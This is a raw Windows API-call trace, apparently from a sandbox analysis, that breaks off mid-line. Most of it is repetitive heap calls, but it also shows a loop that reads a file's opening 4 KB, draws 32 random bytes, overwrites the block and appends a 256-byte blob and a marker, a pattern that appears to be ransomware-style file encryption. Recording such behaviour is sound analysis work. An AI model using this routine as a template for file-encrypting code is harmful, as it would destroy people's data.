[0084.589] GetProcessHeap () returned 0x4f10000 [0084.589] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0084.589] GetProcessHeap () returned 0x4f10000 [0084.589] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0084.590] GetProcessHeap () returned 0x4f10000 [0084.590] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0084.590] GetProcessHeap () returned 0x4f10000 [0084.590] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0084.590] GetProcessHeap () returned 0x4f10000 [0084.590] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0084.590] GetProcessHeap () returned 0x4f10000 [0084.590] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x220) returned 0x7cf6bf8 [0084.590] GetProcessHeap () returned 0x4f10000 [0084.590] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0084.590] GetProcessHeap () returned 0x4f10000 [0084.590] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12358 | out: hHeap=0x4f10000) returned 1 [0084.590] GetProcessHeap () returned 0x4f10000 [0084.590] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d56898 | out: hHeap=0x4f10000) returned 1 [0084.590] GetProcessHeap () returned 0x4f10000 [0084.590] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7cf6bf8 | out: hHeap=0x4f10000) returned 1 [0084.590] GetProcessHeap () returned 0x4f10000 [0084.590] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d56528 | out: hHeap=0x4f10000) returned 1 [0084.590] SetFilePointerEx (in: hFile=0x98c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0084.590] WriteFile (in: hFile=0x98c, lpBuffer=0x7d7f770*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x758fd44, lpOverlapped=0x0 | out: lpBuffer=0x7d7f770*, lpNumberOfBytesWritten=0x758fd44*=0x100, lpOverlapped=0x0) returned 1 [0084.590] WriteFile (in: hFile=0x98c, lpBuffer=0x758fd48*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x758fd44, lpOverlapped=0x0 | out: lpBuffer=0x758fd48*, lpNumberOfBytesWritten=0x758fd44*=0x4, lpOverlapped=0x0) returned 1 [0084.590] GetProcessHeap () returned 0x4f10000 [0084.590] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x8b600d0 | out: hHeap=0x4f10000) returned 1 [0084.590] GetProcessHeap () returned 0x4f10000 [0084.590] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d56870 | out: hHeap=0x4f10000) returned 1 [0084.590] GetProcessHeap () returned 0x4f10000 [0084.590] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d7f770 | out: hHeap=0x4f10000) returned 1 [0084.591] CloseHandle (hObject=0x98c) returned 1 [0084.592] InterlockedExchangeAdd (in: Addend=0x40f168, Value=1 | out: Addend=0x40f168) returned 133 [0084.592] SetFilePointerEx (in: hFile=0x990, liDistanceToMove=0xfffffffc, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0084.592] ReadFile (in: hFile=0x990, lpBuffer=0x758fd4c, nNumberOfBytesToRead=0x4, lpNumberOfBytesRead=0x758fd08, lpOverlapped=0x0 | out: lpBuffer=0x758fd4c*, lpNumberOfBytesRead=0x758fd08*=0x0, lpOverlapped=0x0) returned 1 [0084.592] SetFilePointerEx (in: hFile=0x990, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0084.592] GetProcessHeap () returned 0x4f10000 [0084.592] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x100) returned 0x7d7f770 [0084.592] GetProcessHeap () returned 0x4f10000 [0084.592] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x20) returned 0x7d56870 [0084.592] SystemFunction036 (in: RandomBuffer=0x7d56870, RandomBufferLength=0x20 | out: RandomBuffer=0x7d56870) returned 1 [0084.593] GetProcessHeap () returned 0x4f10000 [0084.593] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x1000) returned 0x8b600d0 [0084.593] ReadFile (in: hFile=0x990, lpBuffer=0x8b600d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x758fd08, lpOverlapped=0x0 | out: lpBuffer=0x8b600d0*, lpNumberOfBytesRead=0x758fd08*=0x1000, lpOverlapped=0x0) returned 1 [0084.640] SetFilePointerEx (in: hFile=0x990, liDistanceToMove=0xfffff000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0084.641] WriteFile (in: hFile=0x990, lpBuffer=0x8b600d0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x758fd44, lpOverlapped=0x0 | out: lpBuffer=0x8b600d0*, lpNumberOfBytesWritten=0x758fd44*=0x1000, lpOverlapped=0x0) returned 1 [0084.641] GetProcessHeap () returned 0x4f10000 [0084.641] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x4) returned 0x7d12358 [0084.641] GetProcessHeap () returned 0x4f10000 [0084.641] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x4) returned 0x7d12368 [0084.641] GetProcessHeap () returned 0x4f10000 [0084.641] RtlReAllocateHeap (Heap=0x4f10000, Flags=0x8, Ptr=0x7d12368, Size=0x20) returned 0x7d56528 [0084.641] GetProcessHeap () returned 0x4f10000 [0084.641] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x4) returned 0x7d12368 [0084.641] GetProcessHeap () returned 0x4f10000 [0084.641] RtlReAllocateHeap (Heap=0x4f10000, Flags=0x0, Ptr=0x7d12368, Size=0x20) returned 0x7d56898 [0084.641] GetProcessHeap () returned 0x4f10000 [0084.641] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x4) returned 0x7d12368 [0084.641] GetProcessHeap () returned 0x4f10000 [0084.641] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0084.641] GetProcessHeap () returned 0x4f10000 [0084.641] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0084.641] GetProcessHeap () returned 0x4f10000 [0084.641] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0084.641] GetProcessHeap () returned 0x4f10000 [0084.641] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0084.641] GetProcessHeap () returned 0x4f10000 [0084.641] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0084.641] GetProcessHeap () returned 0x4f10000 [0084.641] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0084.641] GetProcessHeap () returned 0x4f10000 [0084.641] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0084.641] GetProcessHeap () returned 0x4f10000 [0084.641] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0084.641] GetProcessHeap () returned 0x4f10000 [0084.642] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0084.642] GetProcessHeap () returned 0x4f10000 [0084.642] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0084.642] GetProcessHeap () returned 0x4f10000 [0084.642] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0084.642] GetProcessHeap () returned 0x4f10000 [0084.642] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0084.642] GetProcessHeap () returned 0x4f10000 [0084.642] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0084.642] GetProcessHeap () returned 0x4f10000 [0084.642] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0084.642] GetProcessHeap () returned 0x4f10000 [0084.642] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0084.642] GetProcessHeap () returned 0x4f10000 [0084.642] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0084.642] GetProcessHeap () returned 0x4f10000 [0084.642] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0084.642] GetProcessHeap () returned 0x4f10000 [0084.642] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0084.642] GetProcessHeap () returned 0x4f10000 [0084.642] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0084.642] GetProcessHeap () returned 0x4f10000 [0084.642] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0084.642] GetProcessHeap () returned 0x4f10000 [0084.642] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0084.642] GetProcessHeap () returned 0x4f10000 [0084.642] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0084.642] GetProcessHeap () returned 0x4f10000 [0084.642] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0084.642] GetProcessHeap () returned 0x4f10000 [0084.642] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0084.642] GetProcessHeap () returned 0x4f10000 [0084.642] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0084.642] GetProcessHeap () returned 0x4f10000 [0084.642] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0084.642] GetProcessHeap () returned 0x4f10000 [0084.642] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0084.642] GetProcessHeap () returned 0x4f10000 [0084.642] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0084.642] GetProcessHeap () returned 0x4f10000 [0084.643] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0084.643] GetProcessHeap () returned 0x4f10000 [0084.643] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0084.643] GetProcessHeap () returned 0x4f10000 [0084.643] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0084.643] GetProcessHeap () returned 0x4f10000 [0084.643] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0084.643] GetProcessHeap () returned 0x4f10000 [0084.643] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x24) returned 0x7d4bb68 [0084.643] GetProcessHeap () returned 0x4f10000 [0084.643] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0084.643] GetProcessHeap () returned 0x4f10000 [0084.643] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x40) returned 0x7d51418 [0084.643] GetProcessHeap () returned 0x4f10000 [0084.643] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d4bb68 | out: hHeap=0x4f10000) returned 1 [0084.643] GetProcessHeap () returned 0x4f10000 [0084.643] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x80) returned 0x4f70a70 [0084.643] GetProcessHeap () returned 0x4f10000 [0084.643] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d51418 | out: hHeap=0x4f10000) returned 1 [0084.643] GetProcessHeap () returned 0x4f10000 [0084.643] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x100) returned 0x7d7f878 [0084.643] GetProcessHeap () returned 0x4f10000 [0084.643] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f70a70 | out: hHeap=0x4f10000) returned 1 [0084.643] GetProcessHeap () returned 0x4f10000 [0084.643] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0084.643] GetProcessHeap () returned 0x4f10000 [0084.643] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d7f878 | out: hHeap=0x4f10000) returned 1 [0084.643] GetProcessHeap () returned 0x4f10000 [0084.643] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0084.643] GetProcessHeap () returned 0x4f10000 [0084.643] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0084.643] GetProcessHeap () returned 0x4f10000 [0084.643] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0084.643] GetProcessHeap () returned 0x4f10000 [0084.643] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0084.644] GetProcessHeap () returned 0x4f10000 [0084.644] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0084.644] GetProcessHeap () returned 0x4f10000 [0084.644] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0084.644] GetProcessHeap () returned 0x4f10000 [0084.644] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0084.644] GetProcessHeap () returned 0x4f10000 [0084.644] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0084.644] GetProcessHeap () returned 0x4f10000 [0084.644] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0084.644] GetProcessHeap () returned 0x4f10000 [0084.644] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0084.644] GetProcessHeap () returned 0x4f10000 [0084.644] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0084.644] GetProcessHeap () returned 0x4f10000 [0084.644] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0084.644] GetProcessHeap () returned 0x4f10000 [0084.644] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0084.644] GetProcessHeap () returned 0x4f10000 [0084.644] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0084.644] GetProcessHeap () returned 0x4f10000 [0084.644] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0084.644] GetProcessHeap () returned 0x4f10000 [0084.644] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0084.644] GetProcessHeap () returned 0x4f10000 [0084.644] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0084.644] GetProcessHeap () returned 0x4f10000 [0084.644] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0084.644] GetProcessHeap () returned 0x4f10000 [0084.645] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0084.645] GetProcessHeap () returned 0x4f10000 [0084.645] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0084.645] GetProcessHeap () returned 0x4f10000 [0084.645] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0084.645] GetProcessHeap () returned 0x4f10000 [0084.645] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0084.645] GetProcessHeap () returned 0x4f10000 [0084.645] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0084.645] GetProcessHeap () returned 0x4f10000 [0084.645] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0084.645] GetProcessHeap () returned 0x4f10000 [0084.645] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x220) returned 0x7cf6bf8 [0084.645] GetProcessHeap () returned 0x4f10000 [0084.645] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0084.645] GetProcessHeap () returned 0x4f10000 [0084.645] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12358 | out: hHeap=0x4f10000) returned 1 [0084.645] GetProcessHeap () returned 0x4f10000 [0084.645] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d56898 | out: hHeap=0x4f10000) returned 1 [0084.645] GetProcessHeap () returned 0x4f10000 [0084.645] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7cf6bf8 | out: hHeap=0x4f10000) returned 1 [0084.645] GetProcessHeap () returned 0x4f10000 [0084.645] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d56528 | out: hHeap=0x4f10000) returned 1 [0084.645] SetFilePointerEx (in: hFile=0x990, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0084.645] WriteFile (in: hFile=0x990, lpBuffer=0x7d7f770*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x758fd44, lpOverlapped=0x0 | out: lpBuffer=0x7d7f770*, lpNumberOfBytesWritten=0x758fd44*=0x100, lpOverlapped=0x0) returned 1 [0084.645] WriteFile (in: hFile=0x990, lpBuffer=0x758fd48*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x758fd44, lpOverlapped=0x0 | out: lpBuffer=0x758fd48*, lpNumberOfBytesWritten=0x758fd44*=0x4, lpOverlapped=0x0) returned 1 [0084.646] GetProcessHeap () returned 0x4f10000 [0084.646] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x8b600d0 | out: hHeap=0x4f10000) returned 1 [0084.646] GetProcessHeap () returned 0x4f10000 [0084.646] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d56870 | out: hHeap=0x4f10000) returned 1 [0084.646] GetProcessHeap () returned 0x4f10000 [0084.646] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d7f770 | out: hHeap=0x4f10000) returned 1 [0084.646] CloseHandle (hObject=0x990) returned 1 [0084.650] InterlockedExchangeAdd (in: Addend=0x40f168, Value=1 | out: Addend=0x40f168) returned 134 [0084.650] SetFilePointerEx (in: hFile=0x994, liDistanceToMove=0xfffffffc, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0084.650] ReadFile (in: hFile=0x994, lpBuffer=0x758fd4c, nNumberOfBytesToRead=0x4, lpNumberOfBytesRead=0x758fd08, lpOverlapped=0x0 | out: lpBuffer=0x758fd4c*, lpNumberOfBytesRead=0x758fd08*=0x0, lpOverlapped=0x0) returned 1 [0084.650] SetFilePointerEx (in: hFile=0x994, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0084.650] GetProcessHeap () returned 0x4f10000 [0084.650] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x100) returned 0x7d7f770 [0084.650] GetProcessHeap () returned 0x4f10000 [0084.650] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x20) returned 0x7d56870 [0084.650] SystemFunction036 (in: RandomBuffer=0x7d56870, RandomBufferLength=0x20 | out: RandomBuffer=0x7d56870) returned 1 [0084.650] GetProcessHeap () returned 0x4f10000 [0084.650] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x1000) returned 0x8b600d0 [0084.650] ReadFile (in: hFile=0x994, lpBuffer=0x8b600d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x758fd08, lpOverlapped=0x0 | out: lpBuffer=0x8b600d0*, lpNumberOfBytesRead=0x758fd08*=0x1000, lpOverlapped=0x0) returned 1 [0084.697] SetFilePointerEx (in: hFile=0x994, liDistanceToMove=0xfffff000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0084.697] WriteFile (in: hFile=0x994, lpBuffer=0x8b600d0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x758fd44, lpOverlapped=0x0 | out: lpBuffer=0x8b600d0*, lpNumberOfBytesWritten=0x758fd44*=0x1000, lpOverlapped=0x0) returned 1 [0084.698] GetProcessHeap () returned 0x4f10000 [0084.698] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x4) returned 0x7d12358 [0084.698] GetProcessHeap () returned 0x4f10000 [0084.698] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x4) returned 0x7d12368 [0084.698] GetProcessHeap () returned 0x4f10000 [0084.698] RtlReAllocateHeap (Heap=0x4f10000, Flags=0x8, Ptr=0x7d12368, Size=0x20) returned 0x7d56528 [0084.698] GetProcessHeap () returned 0x4f10000 [0084.698] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x4) returned 0x7d12368 [0084.698] GetProcessHeap () returned 0x4f10000 [0084.698] RtlReAllocateHeap (Heap=0x4f10000, Flags=0x0, Ptr=0x7d12368, Size=0x20) returned 0x7d56898 [0084.698] GetProcessHeap () returned 0x4f10000 [0084.698] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x4) returned 0x7d12368 [0084.698] GetProcessHeap () returned 0x4f10000 [0084.698] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0084.698] GetProcessHeap () returned 0x4f10000 [0084.698] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0084.698] GetProcessHeap () returned 0x4f10000 [0084.698] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0084.698] GetProcessHeap () returned 0x4f10000 [0084.698] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0084.698] GetProcessHeap () returned 0x4f10000 [0084.698] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0084.698] GetProcessHeap () returned 0x4f10000 [0084.698] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0084.698] GetProcessHeap () returned 0x4f10000 [0084.698] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0084.698] GetProcessHeap () returned 0x4f10000 [0084.698] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0084.698] GetProcessHeap () returned 0x4f10000 [0084.698] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0084.698] GetProcessHeap () returned 0x4f10000 [0084.698] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0084.699] GetProcessHeap () returned 0x4f10000 [0084.699] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0084.699] GetProcessHeap () returned 0x4f10000 [0084.699] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0084.699] GetProcessHeap () returned 0x4f10000 [0084.699] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0084.699] GetProcessHeap () returned 0x4f10000 [0084.699] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0084.699] GetProcessHeap () returned 0x4f10000 [0084.699] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0084.699] GetProcessHeap () returned 0x4f10000 [0084.699] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0084.699] GetProcessHeap () returned 0x4f10000 [0084.699] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0084.699] GetProcessHeap () returned 0x4f10000 [0084.699] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0084.699] GetProcessHeap () returned 0x4f10000 [0084.699] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0084.699] GetProcessHeap () returned 0x4f10000 [0084.699] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0084.699] GetProcessHeap () returned 0x4f10000 [0084.699] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0084.699] GetProcessHeap () returned 0x4f10000 [0084.699] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0084.699] GetProcessHeap () returned 0x4f10000 [0084.699] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0084.699] GetProcessHeap () returned 0x4f10000 [0084.699] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0084.699] GetProcessHeap () returned 0x4f10000 [0084.699] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0084.699] GetProcessHeap () returned 0x4f10000 [0084.699] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0084.699] GetProcessHeap () returned 0x4f10000 [0084.699] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0084.699] GetProcessHeap () returned 0x4f10000 [0084.699] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0084.699] GetProcessHeap () returned 0x4f10000 [0084.699] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0084.699] GetProcessHeap () returned 0x4f10000 [0084.699] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0084.700] GetProcessHeap () returned 0x4f10000 [0084.700] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0084.700] GetProcessHeap () returned 0x4f10000 [0084.700] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0084.700] GetProcessHeap () returned 0x4f10000 [0084.700] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x24) returned 0x7d4bb68 [0084.700] GetProcessHeap () returned 0x4f10000 [0084.700] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0084.700] GetProcessHeap () returned 0x4f10000 [0084.700] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x40) returned 0x7d51418 [0084.700] GetProcessHeap () returned 0x4f10000 [0084.700] HeapFree 